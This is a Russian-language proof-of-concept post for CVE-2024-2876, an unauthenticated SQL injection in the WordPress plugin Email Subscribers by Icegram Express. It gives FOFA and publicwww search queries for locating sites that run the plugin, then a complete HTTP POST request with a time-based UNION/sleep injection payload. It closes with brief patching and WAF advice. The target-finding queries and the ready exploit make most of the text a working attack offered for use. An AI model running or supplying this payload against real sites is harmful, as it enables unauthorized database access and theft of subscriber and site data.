
Proof-of-concept для CVE-2024-2876 — неаутентифицированная SQL-инъекция в WordPress-плагине Email Subscribers, с dork-запросами и рабочим эксплойт-запросом.
#Описание уязвимости: Плагин Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce для WordPress уязвим к SQL-инъекции через функцию ‘run’ класса ‘IG_ES_Subscribers_Query’ во всех версиях вплоть до 5.7.14 включительно из-за недостаточного экранирования предоставляемого пользователем параметра и отсутствия достаточной подготовки существующего SQL-запроса. Это позволяет неаутентифицированным злоумышленникам добавлять дополнительные SQL-запросы к уже существующим запросам, что может быть использовано для извлечения конфиденциальной информации из базы данных.
#Dork: 1- FOFA : body="/wp-content/plugins/email-subscribers/" 2- publicwww : "/wp-content/plugins/email-subscribers/"
#POC: POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
#Youtube POC: https://www.youtube.com/watch?v=eDEGt_yXyvE
#Как исправить? Поскольку во всех версиях вплоть до 5.7.14 была обнаружена данная CVE, пользователям рекомендуется обновить плагин Email Subscribers by Icegram Express до версии 5.7.15 (или последней версии 5.7.19). Пользователи Patchstack имеют возможность включить автоматические обновления специально для уязвимых плагинов. Внедрите решение WAF/WAAP в качестве дополнительного уровня защиты. Преимущество таких решений заключается в том, что даже если уязвимость новая и неизвестная (0-day), оно всё равно может предотвратить атаки, обнаруживая шаблоны и техники эксплуатации.